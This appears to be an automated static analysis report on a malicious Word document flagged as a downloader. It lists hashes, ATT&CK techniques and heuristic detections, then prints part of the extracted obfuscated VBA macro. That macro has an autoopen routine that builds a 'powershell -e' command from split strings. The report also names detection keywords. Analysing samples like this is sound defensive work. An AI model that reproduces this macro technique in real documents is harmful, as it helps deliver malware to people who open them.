Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6e990d392e2db7b5…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 230.5 KB
Created: 2019-03-12 07:53:00
Authoring application: Microsoft Office Word
First seen: 2019-08-04
MD5: 91749978ae8ad652d2029a50d80b5510
SHA-1: b807e0f31bc19ce029e9d2a01bfd5c5c3415e03a
SHA-256: 6e990d392e2db7b5dea09010147f4658f09db55f6934a4d067849ccadc1a29cd
Risk Score: 342

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1059 Command and Scripting Interpreter

The sample is a malicious Office document containing obfuscated VBA macros. The macros utilize a GetObject call and reassembled string literals to construct a WMI query for 'winmgmts', which is then used to launch a process. This indicates the macro's intent is to download and execute a second-stage payload. The ClamAV detection and heuristic firings strongly suggest malicious downloader behavior.

Heuristics (9)

  • ClamAV: Doc.Downloader.00536d-6890740-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.00536d-6890740-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API, ProgID or LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) that appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 49210 bytes
SHA-256: 344566484c4bb55e1fe894f785a55f41d5f0f4dd9962dc4ad313799767362789

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "oZDoCABk"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function vQABADZ()
   If wAUDDA = hxGXAkk_ Then
iQUCxkAo = 245895937 * CSng(434190620) / LQ_BAU - CBool(146184842 + EQDA_C) * 970884141 + Sin(525102278 + CDate(TA4CAAx))
jwACDBQ = (qAAAkABw / CInt(dX_DZAc) - dkD1G4A * Fix(104974774) - zAGAwUC - Round(AXDkUU - HBAAUAX / lZAAoA1 - 662838052))
End If
   If VQAA4G = jABkBUU Then
JxXAAD = 740826060 * Log(851122847) / soQAQU1 - Atn(271404698 + t1QAAB) * 915746297 + Fix(162231482 + Sin(hXAA4A))
MAU1BAwB = (pU1AG4A / Cos(c_AAB4x) - D_UABAx1 * Atn(407644382) - YUwcADBA - CDbl(KxAQ4UA - jBDBZD / rBUDXA - 176103019))
End If
   If rAQAxA = RBBAUAD Then
wAADAAXQ = 202891552 * Int(737638416) / VcBBkXA - Hex(376550989 + f1AXAAwA) * 474426165 + CDbl(130638673 + Cos(jG_AUAAk))
ikA41BA = (A_wkAA / CDate(C1UAZA) - uDwQAA * Tan(246002067) - kA1QBA - CSng(sk__BADX - qAADQU / ZAoACwA - 102417437))
End If
   If VoAUCxoX = aBQDUCBD Then
kQ_AxQ = 74649871 * CBool(96464522) / uAGBQxw - Log(900046075 + mUAADxA) * 690139830 + Sgn(515953174 + Sqr(bBUxAU))
WCQQAQD = (rDACAADc / Round(pxQUBZ) - PABo44Q * Atn(929368956) - wQDxAABA - Cos(pAAx1D - hBX1BAA / zAkUAAUA - 834561304))
End If
   If oAAwAQA = DA4ooUA Then
NCAwBZA = 365209079 * Cos(446197933) / DCAZAkA - Int(214021462 + hwUcZQA) * 196024252 + Fix(818847736 + Cos(RBQQBBAQ))
DAoDkUk = (bDD1AAAA / CBool(rAAUAAUA) - cAGCcB_ * Tan(515426922) - IQDAGoc - Sin(BAADBAXA - jAZUDw / V1AAAAc - 808859684))
End If
   If pQBAwDAo = cDUUAZQ Then
JGcAAA = 462339108 * Tan(516614689) / dAAAA4A - Round(779083558 + dAAA_BC) * 375382175 + Sgn(101524028 + Log(sZACxBc))
nBAAQZ = (pAXUBZAo / Sqr(SAwDAw) - b_GAQDGA * Tan(884081560) - iDCAwB - Int(v1coDAQ - sGAAwAc1 / BkAAAAAA - 684701417))
End If
End Function
Sub autoopen()
On Error Resume Next
   If MA_B1144 = IkQQQcA Then
wDAAQoAc = 858691887 * Sqr(582673788) / JcXwUA - Fix(88443558 + AkAQxAAx) * 880730224 + Sgn(823012543 + Sgn(sAGCXC))
QAxA1c = (dkACQAC / CLng(vQQAccQ) - QAZAwC * CLng(140191844) - PDUwxXB - CLng(nAZAcGAA - iAAAZAG / PAkAAQ - 668601793))
End If
   If QAAAAAU = fAAwDc Then
V1AAoo = 63278806 * Atn(555742508) / vAAAAA - CStr(977775803 + iAAAQU) * 613100927 + Fix(521894953 + Round(YAoBX_4))
XBGDBkZX = (zAA_GAC / CStr(akAAkCAA) - CQAD1AA * CLng(905396984) - LxZQACQw - Sgn(awAADB - ckBw_U / NACACAo - 446389576))
End If
   If D4ZAwA = SZxwQAw Then
jAUxBAo = 202346786 * Fix(107575224) / sAAXCAUx - CByte(91505190 + mUAAU1Aw) * 214072059 + CDbl(244209090 + Hex(UkAkZAAc))
jQ1AA14 = (NoBUxo / Log(i1o1_wDG) - CXA_QU * Oct(177462578) - fC_4AoA - Log(bAAABA - MAw1XQUA / WQkAZ1 - 258583782))
End If
l_DDCAU (jAUUBx + "po" + FADAUk_ + "wersh" + QAAADDA + "ell -e " + YAGAAAQx + UAAcQACc + fACABAAX + dDZBAQoc + U4cADAxA + u_DAAGA)
   If YQUw_U = UBoABkAk Then
lAxAAAC = 210690210 * Round(342763755) / wDUoQAUB - Tan(557511061 + UADAAAZ) * 370351941 + Hex(304503937 + CSng(oBAkAUA))
DACAAA = (pAAAQk / Tan(LACQUccD) - HBGAGw * Rnd(279120986) - GAG4GBA - CDbl(fAA_AACc - bD1BxAxA / mAAABGA - 527282575))
End If
   If IxDx_GQ = sZGAB4k Then
bUAG1kZ = 710863586 * Round(625760837) / HCZCBAXA - Int(894190998 + GUDAUQQA) * 496635722 + Hex(257188928 + CBool(fABZAc))
CBUAAcUw = (EGBQ1k1 / Atn(wAxAZDUA) - V_DDDCAc * CDate(939504985) - rQcDXkU - Int(kXZABA - LAXDAZw / P_4xkDD1 - 127284557))
End If
End Sub
Function OUkZkAUB()
   If FAxAGAAA = zBkxAA Then
zQAQAxAw = 366715814 * Log(38438403) / Y4BwAA_ - Fix(385270432 + HA1U1oBC) * 152152554 + Cos(487973135 + Sqr(a1CAAx))
pUcA4Ac = (w4D4AUA / Sqr(kUUAoAUA) - ODA_AA * Fix(983956525) - YACACD - Sin(m4AoXBZ1 - TAGAAw / aGk_oXC - 601396180))
End If
   If ZDkAAQ_ = W_DowAox Then
UQ_AUQAX = 973681694 * Hex(863639344) / mAAAA_ - Tan(643906171 + jAQ_A_o) * 503858573 + Int(59073590 + Round(wGQAAAU))
RZADAUAU = (VDBXQZ / Sgn(iAAUAU) - DAAwAAB * Tan(553480099) - BA1AAA -
... (truncated)